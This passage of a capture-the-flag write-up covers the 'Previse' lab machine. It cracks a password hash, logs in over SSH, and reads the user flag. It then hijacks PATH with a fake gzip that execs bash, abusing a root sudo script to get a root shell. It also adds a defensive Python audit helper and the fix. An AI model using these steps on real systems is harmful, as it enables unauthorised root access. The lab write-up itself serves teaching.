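    salt, _ = split_hash(h)
    print("salt bytes:", len(salt.encode("utf-8")))
    print("cracked:", crack(h, ["password", "ilovecody112235!"]))   # constructed list
```

At roughly a thousand MD5 calls per candidate this is only useful for confirming a result or for a tiny custom wordlist; the 14 million lines of rockyou belong in hashcat, as above.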

24. Cracked: the password is ilovecody112235!. Try it over SSH for m4lwhere.

┌──(kali㉿kali)-[~/桌面]
└─$ ssh m4lwhere@10.10.11.104
The authenticity of host '10.10.11.104 (10.10.11.104)' can't be established.
ED25519 key fingerprint is SHA256:BF5tg2bhcRrrCuaeVQXikjd8BCPxgLsnnwHlaBo3dPs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.104' (ED25519) to the list of known hosts.
m4lwhere@10.10.11.104's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Dec 26 07:52:02 UTC 2023

System load: 0.01 Processes: 177
Usage of /: 49.4% of 4.85GB Users logged in: 0
Memory usage: 22% IP address for eth0: 10.10.11.104
Swap usage: 0%

0 updates can be applied immediately.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$ id
uid=1000(m4lwhere) gid=1000(m4lwhere) groups=1000(m4lwhere)

25. Grab the user flag:

m4lwhere@previse:~$ pwd
/home/m4lwhere
m4lwhere@previse:~$ ls
user.txt
m4lwhere@previse:~$ cat user.txt
deb284bbe7ee6def4fda1b734c37a3a3
m4lwhere@previse:~$

0x02 Getting root

26. Now for root. Start with the sudo rights:

m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$

27. Two details in that output: m4lwhere can run /opt/scripts/access_backup.sh as root, and there is no "Matching Defaults entries" line, so no env_reset or secure_path applies to this command. Look at the script:

m4lwhere@previse:~$ ls -la /opt/scripts/access_backup.sh
-rwxr-xr-x 1 root root 486 Jun 6 2021 /opt/scripts/access_backup.sh
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
m4lwhere@previse:~$ ls -la /var/log/apache2/access.log
ls: cannot access '/var/log/apache2/access.log': Permission denied
m4lwhere@previse:~$ ls -la /var/www/file_access.log
-rw-r--r-- 1 www-data www-data 537 Dec 26 06:44 /var/www/file_access.log

28. The script invokes gzip (and date) by bare name rather than by absolute path, and that is the hook.

The shell resolves a bare command by walking the entries of the PATH environment variable in order and running the first executable it finds. If a file called gzip or date sits in a directory that appears in PATH before /bin (where the real /bin/gzip and /bin/date live), the script runs ours instead, and since the script runs under sudo, it runs as root. On a stock Ubuntu sudo, the secure_path default would replace PATH before the command starts and kill this trick; here sudo -l showed no such default, so the PATH we export as m4lwhere is inherited by the root process.

Either gzip or date would do; we use gzip. The goal is a shell, so the fake gzip simply execs bash. The 1>&2 matters: the script redirects gzip's stdout into the .gz file, so bash's output is sent to stderr to reach the terminal (stdin is still the terminal, so the shell is usable). Then prepend our directory to PATH and run the script through sudo. The relative entry ./ is resolved against the current directory at the moment each command is executed, which works because sudo keeps the working directory; an absolute path such as $PWD is the more robust choice.

echo "/bin/bash 1>&2" > ./gzip
chmod 755 ./gzip
export PATH=./:$PATH
sudo /opt/scripts/access_backup.sh
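The two conditions above (commands resolved through PATH, and no secure_path on the sudo rule) are the things to check on any sudo-able script, so here is a small audit helper as an added example, not tooling from the writeup. It extracts the command names a script resolves through PATH and checks whether the `sudo -l` output shows a secure_path default that would neutralise the hijack. ACCESS_BACKUP_SH and SUDO_L are copied from the box; HARDENED_SUDO_L is a constructed sample of what a stock Ubuntu sudoers prints when secure_path is set; the builtin list is an assumption (anything not in it is treated as an external command).

```python
"""Audit a sudo-able script for commands resolved through PATH, and check
whether sudo's secure_path would neutralise a PATH hijack.

Added example, not tooling from the writeup. ACCESS_BACKUP_SH and SUDO_L are
the script and the `sudo -l` output seen on the box; HARDENED_SUDO_L is a
constructed example of what a stock Ubuntu sudoers prints when secure_path is
set. The builtin list is an assumption: anything not in it is treated as an
external command.
"""
import re

# shell builtins/keywords that never go through PATH (assumption: enough for short scripts)
BUILTINS = {"cd", "echo", "export", "exit", "if", "then", "else", "elif", "fi", "for",
            "do", "done", "while", "set", "local", "return", "read", "test", "[",
            "source", "."}

# a command name at line start or after | ; & ( ; the '(' case also catches $( ... )
CMD_RE = re.compile(r"(?:^|[|;&(])\s*([A-Za-z_][\w.+-]*)")
SECURE_PATH_RE = re.compile(r"\bsecure_path\s*=")


def relative_commands(script: str) -> list:
    """Command names invoked by bare name; absolute paths start with '/' and never match."""
    found = []
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        for m in CMD_RE.finditer(line):
            name = m.group(1)
            if name not in BUILTINS and name not in found:
                found.append(name)
    return found


def secure_path_enforced(sudo_l_output: str) -> bool:
    """True when `sudo -l` shows a secure_path default, i.e. sudo resets PATH for the command."""
    return bool(SECURE_PATH_RE.search(sudo_l_output))


def hijack_candidates(script: str, sudo_l_output: str) -> list:
    """Commands an attacker could shadow via PATH when running this script under sudo."""
    if secure_path_enforced(sudo_l_output):
        return []
    return relative_commands(script)


ACCESS_BACKUP_SH = """#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
"""

SUDO_L = """User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh
"""

# constructed: the shape of a stock Ubuntu sudoers with secure_path in effect
HARDENED_SUDO_L = r"""Matching Defaults entries for m4lwhere on previse:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh
"""

if __name__ == "__main__":
    print("PATH-resolved commands:", relative_commands(ACCESS_BACKUP_SH))
    print("hijackable on the box :", hijack_candidates(ACCESS_BACKUP_SH, SUDO_L))
    print("with secure_path set  :", hijack_candidates(ACCESS_BACKUP_SH, HARDENED_SUDO_L))
```

The fix on the defender's side is either one: write /bin/gzip and /bin/date in the script, or keep sudo's secure_path default so the caller's PATH never reaches the root process. Doing both is cheap.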

29. Run it and read the root flag:

m4lwhere@previse:~$ 
m4lwhere@previse:~$ echo "/bin/bash 1>&2" > ./gzip
m4lwhere@previse:~$ chmod 755 ./gzip
m4lwhere@previse:~$ export PATH=./:$PATH
m4lwhere@previse:~$ sudo /opt/scripts/access_backup.sh
root@previse:~# pwd
/home/m4lwhere
root@previse:~# cat /root/root.txt
641c1e383ce8abf1e95f2f2a2f0591f0
root@previse:~#

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/373

Previse-htb-writeup: https://sh1yan.top/2023/12/25/Previse-htb-writeup/
Author: shiyan
Published: 2023-12-25